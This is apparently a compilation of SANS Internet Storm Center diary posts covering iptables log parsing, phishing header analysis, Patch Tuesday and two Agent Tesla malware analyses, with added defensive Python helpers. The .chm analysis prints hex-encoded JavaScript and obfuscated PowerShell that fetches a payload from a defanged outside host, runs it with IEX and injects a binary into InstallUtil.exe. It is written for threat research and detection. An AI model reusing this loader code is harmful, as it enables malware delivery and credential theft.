# https://www.elastic.co/guide/en/ecs/1.7/ecs-field-reference.html
#
# This custom parser is parsing iptables type firewall logs dump data

# Wed Feb 10 23:59:29 2021 kern.debug kernel: [288253.168004] Firewall WAN DROP (SRC): IN= OUT= MAC=20:b0:01:6d:51:c4:a0:f3:e4:a3:1d:ba:08:00 SRC=xxx.xxx.xxx.xxx DST=xx.xxx.xx.xx LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=6607 PROTO=TCP SPT=55035 DPT=6981 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0x8000000

# Grab the logs file from filebeat which match the pattern /home/guy/logs

filter {
  if [log][file][path] =~ "logs" {
    grok {
      match => { "message" => "^%{HTTPDERROR_DATE:timestamp}.*?%{LOGLEVEL:loglevel}\s+%{WORD:event.provider}:.*Firewall\s+%{WORD:interface.name}\s+%{WORD:event.action}\s+\(%{WORD:network.direction}\).*SRC=%{IP:source.ip}\s+DST=%{IP:destination.ip}\s+.*ID=%{WORD:event.id}\s+PROTO=%{WORD:network.transport}\s+SPT=%{INT:source.port}\s+DPT=%{INT:destination.port}.*" }
    }
  }
}

# Format: Thu Feb 11 08:46:32 2021
# https://docs.oracle.com/javase/7/docs/api/java/text/SimpleDateFormat.html

filter {
  date {
    match => ["timestamp", "EEE MMM dd HH:mm:ss yyyy"]
    target => "@timestamp"
  }
}

# Add GeoIP information to destination hostname

filter {
  if [log][file][path] =~ "logs" {
    geoip { source => "source.ip" }
  }
}

Now that the data is in Elasticsearch, I can create various reports based on the activity logged by iptables. The dashboard I prepared shows the number of records, the top 10 targeted ports (services) and a table with the top 10 sources with their location (GeoIP), the action taken by the firewall and a total.
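The same Grok pattern expressed as a Python regex, so the extraction can be checked without an Elastic stack; this is an added example, not the diary's own code, and the sample lines (RFC 5737 addresses, a made-up MAC) are constructed. to_ecs() nests the dotted field names the way Elasticsearch does, and summarise() reproduces the counts shown on the dashboard.

```python
"""Parse iptables firewall lines the way the diary's Grok filter does, in plain Python."""
import re
from collections import Counter
from datetime import datetime

# Hand translation of the diary's Grok expression. Group names are the ECS field
# names the Logstash filter writes, with "__" standing in for the dot that Python
# group names cannot contain; parse_iptables_line() puts the dots back.
IPTABLES_RE = re.compile(
    r"^(?P<timestamp>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4})"  # HTTPDERROR_DATE
    r".*?(?P<loglevel>[a-z]+)\s+(?P<event__provider>\w+):"            # LOGLEVEL, WORD
    r".*Firewall\s+(?P<interface__name>\w+)\s+(?P<event__action>\w+)"
    r"\s+\((?P<network__direction>\w+)\)"
    r".*SRC=(?P<source__ip>[0-9.]+)\s+DST=(?P<destination__ip>[0-9.]+)"
    r".*ID=(?P<event__id>\w+)\s+PROTO=(?P<network__transport>\w+)"
    r"\s+SPT=(?P<source__port>\d+)\s+DPT=(?P<destination__port>\d+)"
)

# Same layout as the diary's date filter ("EEE MMM dd HH:mm:ss yyyy"). strptime treats a
# space in the format as "one or more", so the kernel's "Feb  1" padding also parses.
TIMESTAMP_FMT = "%a %b %d %H:%M:%S %Y"

# Constructed sample lines (RFC 5737 addresses, made-up MAC); the last one is not a
# firewall event and must be rejected.
MAC = "MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00"
SAMPLE_LINES = [
    "Wed Feb 10 23:59:29 2021 kern.debug kernel: [288253.168004] Firewall WAN DROP (SRC): "
    "IN= OUT= " + MAC + " SRC=192.0.2.10 DST=198.51.100.1 LEN=40 TOS=0x00 PREC=0x00 TTL=245 "
    "ID=6607 PROTO=TCP SPT=55035 DPT=6981 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0x8000000",
    "Mon Feb  1 00:00:05 2021 kern.debug kernel: [319876.001122] Firewall WAN DROP (SRC): "
    "IN= OUT= " + MAC + " SRC=192.0.2.10 DST=198.51.100.1 LEN=40 TOS=0x00 PREC=0x00 TTL=240 "
    "ID=6612 PROTO=TCP SPT=55036 DPT=6981 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0x8000000",
    "Mon Feb  1 00:00:09 2021 kern.debug kernel: [319880.556677] Firewall WAN DROP (SRC): "
    "IN= OUT= " + MAC + " SRC=192.0.2.77 DST=198.51.100.1 LEN=40 TOS=0x00 PREC=0x00 TTL=52 "
    "ID=3 PROTO=TCP SPT=40000 DPT=23 WINDOW=65535 RES=0x00 SYN URGP=0 MARK=0x8000000",
    "Mon Feb  1 00:00:12 2021 kern.info kernel: [319883.000000] eth0: link is up",
]


def parse_iptables_line(line):
    """Return a flat dict keyed by ECS field name, or None if the line is not a firewall event."""
    m = IPTABLES_RE.match(line)
    if m is None:
        return None
    fields = {k.replace("__", "."): v for k, v in m.groupdict().items()}
    fields["@timestamp"] = datetime.strptime(fields.pop("timestamp"), TIMESTAMP_FMT)
    fields["source.port"] = int(fields["source.port"])
    fields["destination.port"] = int(fields["destination.port"])
    return fields


def to_ecs(flat):
    """Nest dotted keys ({"source.ip": x} -> {"source": {"ip": x}}) as Elasticsearch does."""
    doc = {}
    for key, value in flat.items():
        node = doc
        parts = key.split(".")
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return doc


def summarise(lines, top_n=10):
    """Mirror the dashboard: record count, top targeted ports, top sources with their action."""
    records = [r for r in (parse_iptables_line(line) for line in lines) if r]
    ports = Counter(r["destination.port"] for r in records)
    sources = Counter((r["source.ip"], r["event.action"]) for r in records)
    return {
        "records": len(records),
        "top_ports": ports.most_common(top_n),
        "top_sources": sources.most_common(top_n),
    }


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(to_ecs(parse_iptables_line(line) or {}))
    print(summarise(SAMPLE_LINES))
```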

It is always a good idea to monitor and review the activity logged by the modem. If you aren't sure what to look for, we have tips published here, as well as how you can participate and submit your logs to DShield; the service is open and free.

[1] https://www.elastic.co/downloads/logstash
[2] https://www.elastic.co/guide/en/beats/filebeat/7.11/filebeat-module-iptables.html
[3] https://grokdebug.herokuapp.com/
[4] https://isc.sans.edu/howto.html
[5] https://isc.sans.edu/forums/diary/Secure+Communication+using+TLS+in+Elasticsearch/26902/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
13 February 2021

vSphere Replication updates address a command injection vulnerability (CVE-2021-21976) - https://www.vmware.com/security/advisories/VMSA-2021-0001.html, (Sat, Feb 13th)

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
12 February 2021

AgentTesla Dropped Through Automatic Click in Microsoft Help File, (Fri, Feb 12th)

Attackers have plenty of resources to infect our systems. While some files look suspicious because their extension is uncommon (like .xsl files[1]), others look perfectly safe and give the victim confidence to open them. I spotted a phishing campaign that delivers a fake invoice. The attached file is a classic ZIP archive, but it contains a .chm file: a Microsoft compiled HTML Help file[2]. The file is named "INV00620224400.chm" (sha256:af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab) and has a current VT score of 27/59[3]. If you open this file, you get a normal-looking help file (the .chm extension is handled by the c:\windows\hh.exe tool).

But you will also notice a PowerShell window that pops up for a few seconds and then disappears. Let's have a look at the file. You can open .chm files with 7-Zip and browse their content:

The sub-directories starting with "$" and the files starting with "#" are standard in such files, but let's have a look at the file called "sdf48df.htm". As usual, Microsoft provides tools and file formats that are able to work with dynamic content. This is true for help files, which can embed JavaScript code. Here is the content of the .htm file:

<script language="javascript"> var kldfdf='|!3C|!68|!74|!6D|!6C|!3E|!0A|!3C|!74|!69|!74|!6C|!65|!3E|!20|!43|!75|!73|!74|!6F|!6D|!65|!72|!20| !73|!65|!72|!76|!69|!63|!65|!20|!3C|!2F|!74|!69|!74|!6C|!65|!3E|!0A|!3C|!68|!65|!61|!64|!3E|!0A|!3C|!2F|!68|!65| !61|!64|!3E|!0A|!3C|!62|!6F|!64|!79|!3E|!0A|!0A|!3C|!68|!32|!20|!61|!6C|!69|!67|!6E|!3D|!63|!65|!6E|!74|!65|!6F| [...code removed...] !72|!45|!61|!63|!68|!2D|!4F|!62|!6A|!65|!63|!74|!20|!7B|!28|!20|!5B|!43|!6F|!6E|!76|!65|!72|!74|!5D|!3A|!3A|!54|!6F|!49|!6E|!74|!31|!36|!28|!28|!5B|!53|!74|!72|!69|!6E|!67|!5D|!24|!5F|!20|!29|!2C|!20|!38|!29|!20|!2D|!41|!73|!5B|!43|!68|!61|!72|!5D|!29|!7D|!29|!29|!22|!3E|!0A|!0A|!0A|!3C|!2F|!4F|!42|!4A|!45|!43|!54|!3E|!0A|!0A|!3C|!53|!43|!52|!49|!50|!54|!3E|!0A|!73|!68|!6F|!72|!74|!63|!75|!74|!2E|!43|!6C|!69|!63|!6B|!28|!29|!3B|!0A|!3C|!2F|!53|!43|!52|!49|!50|!54|!3E|!0A|!0A'; var fkodflg =bb0df4(kldfdf) document.write(unescape(fkodflg)); function bb0df4(str) { return str.split("|!").join("%"); } </script>

The variable kldfdf is easy to decode (it's just a hex-encoded chunk of data):

<html> <title> Customer service </title> <head> </head> <body> <h2 align=center> Customer service </h2> <p> <h3 align=center> Please Wait... </h3> </p> </body> </html> <OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Item1" value=",C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe, -WindowStyle Hidden $vYeIZ='92^64^43^43^64^44^03^65^65^42^82^85^54^94^B3^72^72^02^E6^96^F6^A6^D2^02^37^27^16^86^34^96^96^36^37^16^42 ^02^D3^64^43^43^64^44^03^65^65^42^B3^D7^22^F5^42^87^03^22^D5^56^47^97^26^B5^D5^27^16^86^36^B5^B7^02^47^36^56^A6^ 26^F4^D2^86^36^16^54^27^F6^64^C7^02^92^72^E5^72^82^47^96^C6^07^37^E2^67^D6^42^02^D3^37^27^16^86^34^96^96^36^37^1 6^42^B3^92^72^76^07^A6^E2^23^16^47^C6^56^44^F2^47^C6^E2^16^27^56^86^F2^F2^A3^07^47^47^86^72^C2^46^F6^86^47^56^D4 [...code removed...] 6^34^26^72^B2^72^56^75^E2^47^72^B2^72^56^E4^02^47^36^72^B2^72^56^A6^26^F4^72^B2^72^D2^77^56^E4^82^72^D3^97^47^47 ^42^B3^23^23^07^42^02^D3^02^C6^F6^36^F6^47^F6^27^05^97^47^96^27^57^36^56^35^A3^A3^D5^27^56^76^16^E6^16^D4^47^E6^ 96^F6^05^56^36^96^67^27^56^35^E2^47^56^E4^E2^D6^56^47^37^97^35^B5^B3^92^23^73^03^33^02^C2^D5^56^07^97^45^C6^F6^3 6^F6^47^F6^27^05^97^47^96^27^57^36^56^35^E2^47^56^E4^E2^D6^56^47^37^97^35^B5^82^47^36^56^A6^26^F4^F6^45^A3^A3^D5 ^D6^57^E6^54^B5^02^D3^02^23^23^07^42';$text =$vYeIZ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))"> </OBJECT> <SCRIPT> shortcut.Click(); </SCRIPT>

How is the PowerShell script executed? A shortcut object is created with the parameter Item1 containing the command to execute. The trick is to call the object's Click() method, which executes the command automatically without any user interaction[4].
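The three encoding layers seen so far (the "|!" substitution in the JavaScript, the reversed "^"-separated hex string in the PowerShell command, and the octal character codes that spell the invoked cmdlet) can be unwound with a few lines of Python. This is an added analyst helper, not code from the diary; the strings it decodes are constructed, benign samples in the same encodings, except for the (111, 105, 130) triple, which is the one quoted above.

```python
"""Decoders for the obfuscation layers used by the .chm sample described above."""
import re
from urllib.parse import unquote


def decode_pipe_bang(encoded):
    """Layer 1: the HTML page's JavaScript swaps "|!" for "%" and calls unescape().
    unquote() covers the %XX form used here (JavaScript's %uXXXX form is not handled)."""
    return unquote(encoded.replace("|!", "%"))


def decode_reversed_hex(stored):
    """Layer 2: the stored string is reversed character by character, split on "^",
    and every token is read as a hex byte, exactly as the PowerShell one-liner does."""
    return "".join(chr(int(token, 16)) for token in stored[::-1].split("^"))


def decode_octal_name(codes):
    """Layer 3: the cmdlet name is hidden as octal codes, e.g. (111, 105, 130)."""
    return "".join(chr(int(str(code), 8)) for code in codes)


def find_reversed_hex_blobs(script):
    """Triage helper: locate quoted '^'-joined hex strings (9 tokens or more) in a script."""
    return re.findall(r"'((?:[0-9A-Fa-f]{2}\^){8,}[0-9A-Fa-f]{2})'", script)


# Constructed samples (not from the malicious file), encoded the same way.
PIPE_BANG_SAMPLE = "|!3C|!68|!74|!6D|!6C|!3E"                          # <html>
REVERSED_HEX_SAMPLE = "72^B6^F6^72^02^47^37^F6^84^D2^56^47^96^27^75"   # Write-Host 'ok'

if __name__ == "__main__":
    print(decode_pipe_bang(PIPE_BANG_SAMPLE))
    print(decode_reversed_hex(REVERSED_HEX_SAMPLE))
    print(decode_octal_name((111, 105, 130)))
```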

Here is the decoded PowerShell script:

$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22; $tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic'); do {   $ping = test-connection -comp google.com -count 1 -Quiet } until ($ping); $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Dow' + 'nlo' + 'adS' + 'tring',[Microsoft.VisualBasic.CallType]::Method,'hxxp://hera[.]lt/Delta2.jpg'); $asciiChars= $mv.split('^') |ForEach-Object {[char][byte]"0x$_"}; $VV0DF44F= $asciiChars -join ''; IEX($VV0DF44F)

This code downloads a fake picture (hxxp://hera[.]lt/Delta2.jpg) that contains another PowerShell script. This one drops and executes the malware on the infected system:

$e00fgfg4=(-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) sal c0d4s75 $e00fgfg4 function AfdEYmOP {       param($GjruFEh)       $GjruFEh = $GjruFEh -split '(..)' | ? { $_ }       ForEach ($aYLEzWVc in $GjruFEh) {           [Convert]::ToInt32($aYLEzWVc,16)       } } [String]$vhghWAdfB='4D5A9@!@!3@!@!@!04@!@!@!FFFF@!@!B8@!@!@!@!@!@!@!4@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!08@!@!@!@!E1FBA0E@!B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072 756E20696E20444F53206D6F64652E0D0D0A24@!@!@!@!@!@!@!5045@!@!4C0103@!46D6196@!@!@!@!@!@!@!@!0E@!@!E210B0108@!@!62 01@!@!06@!@!@!@!@!@!7E8@!1@!@!2@!@!@!0A@!1@!@!@!4@!@!02@!@!@!@!2@!@!04@!@!@!@!@!@!@!04@!@!@!@!@!@!@!@!E@!1@!@!02 [...code removed...] !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@ !@!@!0'.replace('@!','00')   [Byte[]]$lqct=AfdEYmOP $vhghWAdfB  $j1e0d='[System.Ap@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@ain]'.replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','pDom')|c0d4s75;$b05d=$j1e0d.GetMethod("get_CurrentDomain") [String]$lkgY='1F8B08@!@!@!@!@!04@!CCBD07BC5C45F5387EF7EEEE6DDBDEECEEBB5BDFBB9B7E79FB125228EF2590842A553A52C4845 E0C2CF0420D3C82620522A888C6801A152B563458B17714FD62D4489ED87B6F5F1592FF2933B7ED06F0FBF5FBFBFCF3C9BB3B73CECCDCB93 367CE9C3973E6CCB167DCA1A5354DCBC0DFEEDD9AF6A0C6FF566B4FFF6F23FC15BD8F16B507EC87673D983AE6E159275F74F154E7F22B7B1 [...code removed...] 
F897DAC1072A5CAA75DB5F72FCF6C2CE0B17E6DB4EC76BB87EF0D93D6A3474353F1F76A63E@!65B07F6446FC7D619E3F5AFAD50B37F7237F 1EB2E0F47A172EAB1E06FDA12F1FCEF3779CCF8B6A64B40C3E535CE3A0F4D51F44BA75FE0B1EAFE5365DFFEFD8EB4B17C25EA2FD841FC974 C3DD715BF32D7E7DF582E3AB0F71EF5F981F7AEACFD55FBDD0705ABEAB17259D5C3E6536C1D42F1F99FB2B974326F@!65D0E980AE4840AF9 87FDD54B103B3EF32FFF7D4FE41FBFFE3EBEFE2F31162CC5@!6203@!'.replace('@!','00') $dfffgrrr='$b05d.In@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@ke($null,$null)'.replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','vo')| c0d4s75 $jhugrdtf='$dfffgrrr.Lo@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@($lqct)'.Replace('@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@','ad') $jhugrdtf| c0d4s75 [Byte[]]$lkgY2= AfdEYmOP $lkgY [YESS]::f77df00sd('InstallUtil.exe',$lkgY2)

The first dumped file is a DLL (sha256:88774EAD57918BF293205D038402BD64FF6504D1CB1B72DBA2B50061DFE88C79). The second one is a PE file (sha256:39ecb2d1c2a4aa01e62effc56bb27ee8d1fe34ec43e5c99ee0b138410cfa2ca9). Both are unknown on VT. The DLL provides the [YESS]::f77df00sd function, which presumably injects the PE file into a copy of InstallUtil.exe (a tool included in the Microsoft .NET Framework). The PE file is a classic AgentTesla!

[1] https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/
[2] https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help
[3] https://www.virustotal.com/gui/file/af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab/detection
[4] https://docs.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/click-and-hhclick-method

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
12 February 2021

ISC Stormcast For Friday, February 12th, 2021 https://isc.sans.edu/podcastdetail.html?id=7370, (Fri, Feb 12th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
11 February 2021

Agent Tesla hidden in a historical anti-malware tool, (Thu, Feb 11th)

While going through attachments of e-mails, which were caught in my e-mail quarantine since the beginning of February, I found an ISO file with what turned out to be a sample of the Agent Tesla infostealer. That, by itself, would not be that unusual, but the Agent Tesla sample turned out to be unconventional in more ways than one...

The e-mail carrying the ISO attachment was a run-of-the-mill-looking malspam, informing the recipient about a new delivery from DHL. It had a spoofed sender address “dhlSender@dhl.com”, which – although looking at least somewhat believable – certainly didn’t have the impact of making the message appear trustworthy, which is what the authors of the e-mail were most likely hoping for. On the contrary, it must have resulted in very few of the messages actually making it past any security analysis on e-mail gateways. The reason is that DHL has a valid SPF record set up for dhl.com, so any SPF check (i.e. something that most of the world’s e-mail servers perform automatically these days) would lead to a “soft fail” result, which would consequently most likely lead to the message being quarantined (if not deleted outright).

The attached file Download_Tracking_Reference.01.02.2021.xlsx.iso contained only one EXE with identical name (except for the second extension, of course).

The executable was written in VB.NET and its malicious payload was hidden in it in an interesting way – the file had two bitmaps embedded in its Resources section, both of which were in fact encoded/encrypted DLLs.

While the use of bitmaps for embedding DLLs is not new for Agent Tesla[1], it is certainly an interesting way to hide malicious code and prevent its detection. In this case, it didn’t seem to help the file too much, given its 41/71 VT score at the time of writing[2], but it is quite an imaginative technique nonetheless.

After the file was executed, it would first decode and load a small (10kB) DLL named BestFit.dll.

Using this first DLL, the malware would then decode, decrypt and load a much larger (430kB) DLL called PositiveSign.dll.

Since the second DLL was heavily obfuscated and its authors used a couple of anti-analysis techniques in it, I didn’t have time to go through it in detail, but from the portions of the code I saw, it did appear to contain the final stage of the payload.

What turned out to be even more interesting than the use of bitmaps to store encoded/encrypted DLLs, however, was the code of the original executable in which the "malicious bitmaps" were hidden. The EXE, which was originally named HashHelpers.exe, had its description and product name set to Virus Effect Remover. This was the name of a legitimate anti-malware tool developed during the 2000s and the first half of the 2010s.

This, by itself, would not be that unusual, since malware authors sometimes like to name their creations in creative or provocative ways. Nevertheless, in this case, the name wasn’t the only thing which the authors of Agent Tesla borrowed from the anti-malware tool… They reused significant portions of its code as well.

When comparing the malicious file with the latest available release of the real tool[3], it can be clearly seen that large parts of both binaries are (nearly) identical.

Although the original code in the malicious EXE is never executed, the authors of the malware reused large parts of it when making their creation. Since Virus Effect Remover was also written in VB.NET, getting to the code and repurposing it, even when working from a compiled executable, would of course be trivial for them.

Even though the use of "trojanized" security tools is not a novel concept by any means, I think this was the first time I’ve seen it done in this way – i.e. by using the code of an old anti-malware solution without trying to pass the resulting executable off to target users as the original tool.

While we can only speculate on why the creators of the malicious code chose to hide it in the code of a historical security tool, by far the most probable explanation seems to be that this was done in an attempt to make the malware seem benign to anti-malware scanners. And since some security tools use signature-based allow-listing mechanisms to avoid scanning known security tools, this might have actually worked in some instances...

 

Indicators of Compromise (IoCs)
Download_Tracking_Reference.01.02.2021.xlsx.iso (806 kB)
MD5 - 2ceb9c4347aed5dd387d261b40473f46
SHA-1 - d4b93dd1bfb531b228353451977185f039407741

Download_Tracking_Reference.01.02.2021.xlsx.exe / HashHelpers.exe (745 kB)
MD5 - 9417df6dc7d716b0b69e587c9d89981b
SHA-1 - e905472faad91b87dbfc7afc838564fde3c87aa3

BestFit.dll (10 kB)
MD5 - a32a0b1cc226475671801360f6c53419
SHA-1 - aa6d74a2db3c430175e79f581afc29240b17ae6c

PositiveSign.dll (430 kB)
MD5 - 8b1e495e40571a5912f672f38f47058d
SHA-1 - c900af54932bdd4c8fd749cecb5689e7e2082037

 

[1] https://www.zscaler.com/blogs/security-research/linkedin-job-seeker-phishing-campaign-spreads-agent-tesla
[2] https://www.virustotal.com/gui/file/101399675ec99fcca0b69a0d6c146431c3a28c10d322499c817b2197e86971b5/detection
[3] https://sourceforge.net/projects/viruseffectremo/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 11.

ISC Stormcast For Thursday, February 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7368, (Thu, Feb 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
10 February 2021

ISC Stormcast For Wednesday, February 10th, 2021 https://isc.sans.edu/podcastdetail.html?id=7366, (Wed, Feb 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
10 February 2021

Phishing message to the ISC handlers email distro, (Wed, Feb 10th)

Introduction

The ISC handlers email distro gets plenty of spam and phishing emails on a daily basis.  Most of these are filtered so they never make it to the inbox; however, every once in a while one gets through.

Today's diary reviews an example of a phishing email from our inbox on Tuesday 2021-02-09.


Shown above:  Email headers from the phishing message.

The email

As shown in the previous image, the sending address had been spoofed to look like it came from administrator@sans.isc.edu.  But the message actually came to our mail server from 165.232.128[.]118.  That much we can confirm, because it was the most recent Received: from line before it hit our mail server.  Anything else can be spoofed.  Based on the only other Received: from line, this message might have originated from 69.12.85[.]209, but that line could have been added to confuse analysts.


Shown above:  Screenshot of the phishing message when viewed in the Thunderbird email client.

The phishing message has a URL to hxxps://soberlab[.]ca/sl.html?email=[phishing recipient's email address].  The domain soberlab[.]ca seems to be hosting a legitimate website, and that legitimate website may have been compromised to host the phishing URL.


Shown above:  Opening link from the phishing message in a web browser.

Phishing traffic


Shown above:  Traffic from viewing the email link filtered in Wireshark.

The HTTPS link from the email redirects to a phishing page at hxxp://aromatee[.]com[.]au/inc/mail.php.  Like the previous URL, this one looks like it's hosted on a legitimate domain using a server that's been compromised to host a phishing URL.  I entered a fake password, and the data was sent over HTTP back to the server.


Shown above:  HTTP POST request with the fake password I entered.

Final words

These types of emails are all too common, and they're remarkably cost-effective.  While most of you wouldn't fall for it, people are fooled by similar messages.  Therefore, phishing will remain a viable social engineering technique.

A sanitized version of the email shown in this diary, along with a pcap of traffic to the associated phishing page, can be found here.
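One way to apply the rule from the header analysis at the top of this diary (only the Received: line written by your own mail server can be trusted; everything below it arrived with the message and may have been added to mislead analysts) mechanically. This is an added example, not anything from the diary; the message, host names and RFC 5737 addresses are constructed, not the real headers.

```python
"""Walk a message's Received: chain, trusting only the hops our own mail server recorded."""
import email
import re
from email.utils import parseaddr

# Constructed sample. The top Received: line is the one our MX (OUR_MX) added when the
# message arrived from 192.0.2.118; the line below it was already inside the message
# and claims an earlier hop from 198.51.100.209, which we cannot verify.
OUR_MX = "mx.example.net"
SAMPLE_MESSAGE = """\
Received: from mail.sender.example (unknown [192.0.2.118])
\tby mx.example.net (Postfix) with ESMTP id PLACEHOLDER1
\tfor <handlers@example.net>; Tue, 9 Feb 2021 14:02:11 +0000
Received: from [198.51.100.209] (unknown [198.51.100.209])
\tby mail.sender.example with ESMTPA id PLACEHOLDER2
\tfor <handlers@example.net>; Tue, 9 Feb 2021 14:01:58 +0000
From: administrator@example.net
To: handlers@example.net
Subject: Constructed phishing sample

Please review the attached notice.
"""

RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
RECEIVED_BY_RE = re.compile(r"\bby\s+([A-Za-z0-9.-]+)")


def received_chain(raw_message, our_mx):
    """Return [(by_host, from_ip, trusted)] in header order (newest hop first).
    A hop stays trusted only while it and every hop above it were recorded by our_mx;
    from the first foreign hop downwards the lines are sender-supplied."""
    msg = email.message_from_string(raw_message)
    chain, trusted = [], True
    for value in msg.get_all("Received", []):
        by = RECEIVED_BY_RE.search(value)
        ip = RECEIVED_IP_RE.search(value)
        by_host = by.group(1) if by else None
        if by_host != our_mx:
            trusted = False
        chain.append((by_host, ip.group(1) if ip else None, trusted))
    return chain


def sending_ip(raw_message, our_mx):
    """The only source address we can vouch for: the hop recorded by our own MX."""
    for _, ip, trusted in received_chain(raw_message, our_mx):
        if trusted and ip:
            return ip
    return None


def triage(raw_message, our_mx, our_domain):
    """Summarise what can and cannot be trusted about where the message came from."""
    msg = email.message_from_string(raw_message)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    chain = received_chain(raw_message, our_mx)
    return {
        "sending_ip": sending_ip(raw_message, our_mx),
        # A From: address in our own domain arriving from an outside host is a spoofing signal
        "claims_internal_sender": sender.endswith("@" + our_domain.lower()),
        "untrusted_hops": [ip for _, ip, trusted in chain if not trusted and ip],
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MESSAGE, OUR_MX, "example.net"))
```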

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
9 February 2021

Microsoft February 2021 Patch Tuesday, (Tue, Feb 9th)

This month we got patches for 56 vulnerabilities. Of these, 11 are critical, 1 is being exploited and 6 were previously disclosed.

The exploited vulnerability is an elevation of privilege vulnerability affecting Win32k (CVE-2021-1732). This is a local vulnerability, which means that to exploit the vulnerability, an attacker would have to have local access to the machine (console or SSH for example) or rely on user interaction, like a user opening a malicious document.  The CVSS v3 score for this vulnerability is 7.80.

The highest CVSS score this month (9.80) was given to 4 vulnerabilities. One of those is a critical Remote Code Execution (RCE) vulnerability in Microsoft DNS Server (CVE-2021-24078). This vulnerability would allow a remote unauthenticated attacker to execute code with the service's privileges on the target host. As this vulnerability does not require user interaction, it is potentially wormable and requires your attention if you have Microsoft DNS Server in your network, especially if it is exposed to the Internet.

There are also two RCEs worth mentioning this month, both affecting Windows TCP/IP. The first (CVE-2021-24074) affects IPv4 and involves source routing. Although source routing is blocked by default in Windows, the system still processes the request and returns an ICMP message denying it. Microsoft's advisory documents a workaround that makes the system drop these requests altogether without any processing. The vulnerability affecting IPv6 (CVE-2021-24094) is related to packet fragmentation. Both vulnerabilities have a CVSS v3 score of 9.80.

Amongst already disclosed vulnerabilities, there is a critical RCE affecting .Net Core 2.0, 3.1 and 5.0 (CVE-2021-26701). The CVSS v3 for this vulnerability is 8.10. There are no details.

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com.

February 2021 Security Updates

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET Core Remote Code Execution Vulnerability | CVE-2021-24112 | No | No | Less Likely | Less Likely | Critical | 8.1 | 7.3
.NET Core Remote Code Execution Vulnerability | CVE-2021-26701 | Yes | No | Less Likely | Less Likely | Critical | 8.1 | 7.1
